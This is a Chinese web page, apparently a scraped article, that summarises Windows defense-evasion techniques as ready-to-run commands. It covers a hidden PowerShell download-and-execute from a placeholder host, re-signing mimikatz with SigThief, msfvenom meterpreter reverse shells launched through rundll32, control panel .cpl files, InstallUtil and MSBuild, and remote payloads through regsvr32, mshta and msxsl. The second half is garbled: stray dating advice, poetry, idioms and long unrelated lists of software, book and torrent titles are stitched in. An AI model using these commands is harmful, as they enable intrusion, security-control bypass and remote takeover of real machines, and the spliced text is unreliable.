今天小编为大家带来Windows命令执行防御规避总结,具体如下:
powershell
powershell.exe -nop -w hidden -c \\“IEX ((new-object net.webclient).downloadstring(‘http://xx.xx.xx.xx:8888/logo.gif’))\\”“ /f
SIP
通过sip劫持对恶意代码签名获得系统信任https://github.com/secretsquirrel/SigThief
python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe
rundll32.exe
生成
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll
目标执行
rundll32.exe shell32.dll,Control_RunDLL xxx.dll
Regsvr32.exe
msfconsole
auxiliary/server/regsvr32_command_delivery_server
set CMD net user test 123456 /add
目标执行
regsvr32 /s /n /u /i:http://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll
InstallUtil.exe
1.编译后门:
C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\x64\\key.snk“ xxx.cs
2.靶机上运行:
InstallUtil.exe /U xxx.exe
3.msf监听,得到反弹的shell:
set payload windows/x64/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 4444
exploit
Msbuild.exe
MSBuild是Microsoft Build Engine的缩写,代表Microsoft和Visual Studio的新的生成平台,MSBuild可编译特定格式的xml文件
https://github.com/3gstudent/msbuild-inline-task
msf生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444
-f csharp
使用shellcode替换https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分
msf监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xx.xx.xx.xx
set lport 4444
exploit
运行
C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe exec64.xml
CMSTP
cmstp.exe /s /ns C:\\Users\\administrator\\AppData\\Local\\Temp\\XKNqbpzl.txt绕过AppLocker并启动恶意脚本
Mshta.exe
Mshta.exe 是一个执行 Microsoft HTML 应用程序 (HTA) 的实用程序,攻击者可以使用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意代码
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx
msf exploit(windows/misc/hta_server) 》 exploit
mshta.exe http://xx.xx.xx.xx:8080/xxxxxxx.hta
控制面板
攻击者可以使用控制面板项作为有效载荷来执行任意命令,控制面板项是注册的可执行文件(.exe)或控制面板(.cpl)文件,可以直接从命令行执行或通过Control_RunDLL(API)调用或者直接双击文件。
攻击者构造恶意的dll文件CPIApplet.dll
利用msf生成dll文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll
传入windows机器,然后重命名为CPIApplet.cpl,通过control.exe c:\\users\\administrator\\desktop\\CPIApplet.cpl 执行命令
通过msxsl.exe调用恶意xml文件执行脚本
制作两个文件
customers.xml
script.xsl
xmlns:xsl=”http://www.w3.org/1999/XSL/Transform“
xmlns:msxsl=”urn:schemas-microsoft-com:xslt“
xmlns:user=”http://mycompany.com/mynamespace“》
function xml(nodelist) {
var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);
return nodelist.nextNode().xml;
}
开启http服务
python3 -m http.server 8046. 不要因为自己长相不如对方而放弃追求的打算,长相只是一时的印象,真正决定能否结合主要取决于双方的性格。我见过的帅哥配丑女,丑女配帅哥的太多了。
远程下载执行
msxsl.exe http://xx.xx.xx.xx/customers.xml http://xx.xx.xx.xx/scrip.xsl
Windows命令执行防御规避总结目苦苦地想(高山深涧苦思冥想)瞪口呆48. 喝咖啡,在举杯就口之际,喝的是一点点凝聚成一小盏的亦虚亦实的嗅觉和味觉。放下杯子以后,回味的是一点点窝心的感觉。come up with 提出;make (good) use of (充分) 利用387.天下事有难易乎?为之,则难者亦易矣;不为,则易者亦难矣。彭端淑《为学》 候馆梅残,溪桥柳细,草薰风暖摇征辔。离愁渐远渐无穷,迢迢不断如春水。腾骧磊落三万匹,皆与此图筋骨同。Windows,Windows命令执行,Windows命令执行防御规避总结All these changes in China’s economic life have brought changes in China’s social and cultural life as well, many of which unwanted.
- Winxp系统网上邻居打不开无法访问怎么办?
- Win10磁盘新建跨区卷灰色怎么回事?如何新建跨区卷?
- WPS中的免费简历在哪里?
- Word表格不能调整行高怎么解决?
- Word空白处不显示下划线怎么办?
- Win10提示“无法保存IP设置,请检查一个或多个设置并重试”怎么办?
- Win10电脑怎么彻底禁止系统自动更新?Win10电脑彻底禁止自动更新方法
- 电脑administrator到底指什么?
- 怎么打开DMP转储文件?Win10开启蓝屏故障信息收集的操作方法
- Win10注册dll文件提示找不到入口点怎么办?
- PPT里如何插入思维导图?
- 华为麒麟处理器排行榜 2021麒麟处理器天梯排行榜最新版
- 什么笔记本打游戏好用?2021年从入门到高端性价比高游戏本推荐
- Win10系统无法删除office的iso安装镜像文件怎么办?
- lost.dir是什么文件夹?Win7 Sd卡&U盘里lost.dir是什么意思?
- Win10系统Windows安全中心闪退怎么解决?
- U盘文件夹感染exe病毒要怎么解决?
- Windows10系统提示ctfmon.exe成功未知硬盘错误怎么解决?
- U盘装系统用什么软件比较好?
- Win7怎么加密电脑硬盘?Win7加密电脑硬盘操作方法
- 这篇电脑常识告诉你:IP地址是什么?通俗易懂
- Win7锁定计算机如何设置?Win7锁定计算机设置方法分享
- Win7提示Windows延缓写入失败怎么办?
- 网络突然出现故障了怎么办?电脑上不了网的解决办法
- Win7怎么查找关机错误原因?Win7查找关机错误原因的方法分享
- MJTNet ClipMagic v4.0.05
- 一键解决QQ与360兼容工具 v1.0
- 多功能便笺软件minipad2 v3.20
- MD5计算器 v7.1.2.8
- 黑云一键还原系统 v1.6
- CAD真正批量打印程序 v2.1
- 豪迪手机号码归属地查询 v1.0
- 天涯通讯录 v5.0 局域网版
- jpg图片伪装工具 2010.11.2
- 非主流火星输入法 v1.0
- 法拉贝尔四项修改器 V3.0 绿色版
- versus五项修改器 V3.0 绿色版
- 生死狙击刷金币 V1.0 绿色版
- 海豚模拟器(Dolphin)64位 V4.0.720 莫妮卡汉化绿色版
- 鬼谷八荒邀约双修对话修改MOD v1.0
- 无限饥饿六项修改器 v1.0
- 模拟人生4盛开花瓣珍珠戒指MOD v1.0
- Dolphin模拟器 V4.0.720 中文绿色版
- 孤岛惊魂3八项修改器 V1.0 绿色版
- PPTV游戏中心 V1.5.6.0007
- topaz
- top brass
- topcoat
- top dog
- top-down
- topee
- top-flight
- top hat
- top-heavy
- topiary
- 廿一世纪初的前言后语(上)
- 逝水留恒(十二组影像背后的故事)(精)
- 啪小壁虎(精)
- 大家一起玩(精)/宝宝没想到中英双语翻翻书
- 儿童教育心理学
- 木棉流年/儿童文学金牌作家书系
- 中国画论史
- 小狗臭臭(精)
- 公主的仙衣/麦哆传奇
- 从一变多(从种子到节日盛宴)(精)
- →→→→→【日本剧集下载 每日更新 汇总】【2023-06-01(周四)更新】←←←←← 剧集 合 集 日本 剧情
- →→→→→【日本动漫下载 每日更新 汇总】【2023-06-01(周四)更新】←←←←← 剧集 合 集 日本 动画
- [BT下载][传教士 第三季][全10集][WEB-MKV/28.35G][简繁英字幕][1080P][Amazon][Xiaomi] 剧集 2018 美国 剧情 打包
- [BT下载][传教士 第四季][全10集][WEB-MKV/23.99G][简繁英字幕][1080P][Amazon][Xiaomi] 剧集 2019 美国 剧情 打包
- [BT下载][公诉][第03-04集][WEB-MP4/0.65G][国语配音/中文字幕][1080P][Huawei] 剧集 2023 大陆 剧情 连载
- [BT下载][公诉][第03-04集][WEB-MP4/0.90G][国语配音/中文字幕][4K-2160P][H265][Huawei] 剧集 2023 大陆 剧情 连载
- [BT下载][公诉][第03-04集][WEB-MP4/2.04G][中文字幕][4K-2160P][H265][Xiaomi] 剧集 2023 大陆 剧情 连载
- [BT下载][公诉][第03-04集][WEB-MP4/1.23G][国语配音/中文字幕][1080P][BlackTV] 剧集 2023 大陆 剧情 连载
- [BT下载][公诉][第03-04集][WEB-MP4/1.23G][国语配音/中文字幕][1080P][SeeWEB] 剧集 2023 大陆 剧情 连载
- [BT下载][公诉][第03-04集][WEB-MP4/3.01G][国语配音/中文字幕][4K-2160P][60帧率][H265][BlackTV] 剧集 2023 大陆 剧情 连载